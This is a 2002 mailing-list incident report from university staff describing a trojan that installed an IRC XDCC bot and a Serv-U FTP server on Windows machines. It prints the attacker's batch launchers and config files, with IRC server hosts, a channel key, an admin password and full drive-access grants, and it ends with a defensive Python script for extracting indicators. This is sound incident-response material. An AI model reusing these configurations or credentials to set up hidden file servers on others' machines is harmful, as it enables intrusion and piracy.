From: Ocasio, Juan Carlos (jcocasioUTEP.EDU)
Date: Wed May 29 2002 - 16:07:48 CDT

    We found what might be a possible IRC Proxy/File Server trojan.

    Several Windows machines have already fallen prey to a set of files that set
    up what seems to be both an IRC proxy and an IRC file server. The first
    noticeable factor is a substantial number of CMD.EXE processes running in
    the background. Other signs are pIdentd.exe, win.exe, start.exe and
    services.exe also running. When you telnet to localhost on port 880, you
    are greeted with a welcome screen for the FTP server. The actual server
    application is called Serv-U FTP Server v4.0 (4.0.0.4), written by Cat Soft,
    who is an affiliate of Rhino Software, Inc.

    It seems several files are uploaded and some folders are created.
    In Winnt\system\ there are two folders created, called tools and win.

    The tools folder holds the following files:
    Services.exe
    Srvss.exe
    Start.exe
    BugSlayerUtil.dll
    TzoLibr.dll
    ServUDaemon.ini
    In
    Misc
    Temp
    ServUStartUpLog.txt

    The ServUDaemon.ini seems to be the configuration file for the FTP server
    containing the following information:

    [GLOBAL]
    Version=4.0.0.4
    RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASgAABKCQgDwQJwEQBS0t
    LS0tBC0tLS0=
    ProcessID=304
    [DOMAINS]
    Domain1=0.0.0.0||880|Server|1|0
    [Domain1]
    User1=admin|1|0
    Group1=leech
    User2=hotstuff|1|0
    ReplyHello=Apache Web Server.
    SignOn=c:\winnt\system\tools\in
    DirChangeMesFile=c:\winnt\system\tools\misc
    DirChangeMesFile2=c:\winnt\system\tools\misc
    ReplyHelp=
    ReplyNoAnon=
    ReplyNoCredit=
    ReplyTooMany=
    ReplyDown=
    ReplyOffline=
    [GROUP=leech|1]
    Access1=c:\winnt\system\win\fl|RLP
    [USER=hotstuff|1]
    Password=wx4FA54520E4CA1E722F1D0AAE119BE27E
    HomeDir=c:\winnt\system\win\fl
    RelPaths=1
    AlwaysAllowLogin=1
    TimeOut=600
    Maintenance=System
    Access1=c:\winnt\system\win\fl|RWAMLCDP
    [USER=admin|1]
    Password=xtEE32F1B26B1DAF9A40BC2C68BC3FC83F
    HomeDir=c:\winnt\system\win\fl
    AlwaysAllowLogin=1
    TimeOut=600
    Maintenance=System
    Access1=c:\|RWAMELCDP
    Access2=d:\|RWAMELCDP
    Access3=e:\|RWAMELCDP
    Access5=f:\|RWAMELCDP
    Access6=g:\|RWAMELCDP
    Access7=h:\|RWAMELCDP

    Taking a look at the ServUStartUpLog.txt log file you see this:

    Wed 22May02 21:15:19 - Serv-U FTP Server v4.0 (4.0.0.4) - Copyright (c)
    1995-2002 Cat Soft, All Rights Reserved - by Rob Beckers
    Wed 22May02 21:15:19 - Cat Soft is an affiliate of Rhino Software, Inc.
    Wed 22May02 21:15:20 - Using WinSock 2.0 - max. 32767 sockets
    Wed 22May02 21:15:20 - Starting FTP Server...
    Wed 22May02 21:15:20 - PROBLEM: Unable to load the SSL/TLS libraries
    (SSLEAY32.DLL and LIBEAY32.DLL) - No SSL support
    Wed 22May02 21:15:20 - FTP Server listening on port number 880, IP
    129.108.0.58, 127.0.0.1
    Wed 22May02 21:15:20 - FTP Server listening on port number 43958, IP
    127.0.0.1
    Wed 22May02 21:15:20 - Valid registration key found

    It seems like this software was actually purchased by someone.

    Now the start.exe file seems to be a file created in VB that points to 4-5
    bat files in c:\winnt\system32 called:

    go.bat
    goa.bat
    gob.bat
    goc.bat
    god.bat

    We did notice that not all machines have the god.bat file. At least mine
    did not have it, but another machine did.

    The following is the content of each bat file:

    ----go.bat----
    cd winnt
    cd system32
    Pidentd.exe /keepalive

    -----goa.bat----
    cd \
    cd winnt
    cd system
    cd tools
    services.exe

    -----gob.bat----
    c:
    cd \
    cd winnt
    cd system
    cd win
    win.exe cfg.dll

    -------goc.bat------
    c:
    cd \
    cd winnt
    cd system
    cd win
    win.exe gfc.dll

    gfc.dll seems to be a typo; the actual name is cfg.dll, which is a
    configuration file hidden as a .dll file.
    It contains the following information:

    xdccfile x32.dll
    pidfile pidv32.dll
    #logfile l.dll
    logstats no
    logrotate weekly
    messagefile MS.dll
    ignorefile IGNO32.dll
    connectionmethod direct
    server wcxdcc1.darktech.org 6667
    server wcxdcc2.darktech.org 6667
    server wcxdcc3.darktech.org 6667
    server wcxdcc4.darktech.org 6667
    channel #Warez-Central -plist 10 -pformat full -key distr0z
    user_nick WC-DCC757
    user_realname W-C
    user_modes +i
    virthost no
    vhost_ip virtip.domain.com
    firewall no
    dccrangestart 4000
    loginname CENTRAL
    slotsmax 10
    queuesize 15
    slotsmaxpack 0
    slotsmaxslots 8
    slotsmaxqueue 10
    maxtransfersperperson 1
    maxqueueditemsperperson 1
    filedir c:\winnt\system\win\fl
    restrictlist yes
    restrictsend yes
    overallminspeed 0.0
    transfermaxspeed 0.0
    overallmaxspeed 0
    overallmaxspeeddayspeed 0
    overallmaxspeeddaytime 9 17
    overallmaxspeeddaydays MTWRF
    debug no
    autosend no
    autoword blah
    automsg blah
    autopack 1
    xdccautosavetime 30
    creditline [W-C] Brought To You By #Warez-Central [W-C]
    adminpass EcFQIXR8y02ok
    adminhost *!**
    uploadallowed yes
    uploaddir c:\winnt\system\win\fl
    uploadmaxsize 0

    Now, as you can see, this points to the servers as well as the login names and
    passwords. You also notice the upload directory of c:\winnt\system\win\fl.
    This directory is the upload directory that is being used to house files.
    (We actually found some MP3s on one machine.) In the win folder you find a
    file called win.exe. This file seems to be the actual IRC proxy being used.

    Files used:
    win.exe
    start.exe
    pIdentd.exe
    services.exe
    folders:
    c:\winnt\system32 (bat files)
    c:\winnt\system\win
    c:\winnt\system\tools
    c:\winnt\system\win\fl (Upload directory)

    Now we still don't know how it got in and we are still doing more research
    on this. But has anyone else run into something similar? We searched on
    this, but couldn't find anything. Is this a known exploit?

    Any information would be helpful.

    Thanks,

    Juan Carlos Ocasio
    Darrel Troxel
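A small triage helper for the two configuration files quoted in the post, added here as an example and not part of the original message: it pulls the FTP listening port and per-user access roots out of the Serv-U INI, and the IRC servers, channel and upload directory out of the iroffer-style cfg.dll. The sample inputs are constructed from the excerpts above, and the field layouts (port as the third `|`-separated field of a Domain line, `key value` lines in cfg.dll) are assumptions read off those excerpts.

```python
"""Extract indicators from the Serv-U ServUDaemon.ini and iroffer-style cfg.dll
formats quoted in the post. Added example, not from the post; the samples are
constructed from the message's excerpts and the field layouts are assumed."""
import configparser
import re

SERVU_INI = r"""[DOMAINS]
Domain1=0.0.0.0||880|Server|1|0
[USER=admin|1]
HomeDir=c:\winnt\system\win\fl
Access1=c:\|RWAMELCDP
Access2=d:\|RWAMELCDP
"""

IROFFER_CFG = r"""server wcxdcc1.darktech.org 6667
server wcxdcc2.darktech.org 6667
channel #Warez-Central -plist 10 -pformat full -key distr0z
filedir c:\winnt\system\win\fl
uploaddir c:\winnt\system\win\fl
"""

def servu_indicators(text):
    """Listening ports, each user's home dir and any whole-drive access grants."""
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None, strict=False)
    cp.optionxform = str  # keep key case (Domain1, HomeDir, Access1)
    cp.read_string(text)
    # Assumed layout from the post: ip||port|name|...; the port is field 2
    ports = [int(v.split("|")[2]) for k, v in cp["DOMAINS"].items() if k.startswith("Domain")]
    users = {}
    for sec in cp.sections():
        if sec.startswith("USER="):
            name = sec[len("USER="):].split("|")[0]
            roots = [v.split("|")[0] for k, v in cp[sec].items() if k.startswith("Access")]
            users[name] = {"home": cp[sec].get("HomeDir", ""),
                           "drive_roots": [r for r in roots if re.fullmatch(r"[a-z]:\\", r, re.I)]}
    return {"ports": ports, "users": users}

def iroffer_indicators(text):
    """IRC servers, channels and the directories the bot serves and accepts uploads into."""
    servers, channels, dirs = [], [], set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):  # '#' lines are comments, as in the post
            continue
        key, _, rest = line.partition(" ")
        if key == "server":
            host, _, port = rest.partition(" ")
            servers.append((host, int(port or 6667)))
        elif key == "channel":
            channels.append(rest.split()[0])  # drop the -plist/-key options
        elif key in ("filedir", "uploaddir"):
            dirs.add(rest)
    return {"servers": servers, "channels": channels, "dirs": sorted(dirs)}
```

Feeding the full files from an infected host through these two functions gives the port, drive-root grants, IRC hosts and upload path to block or hunt for across the rest of the network.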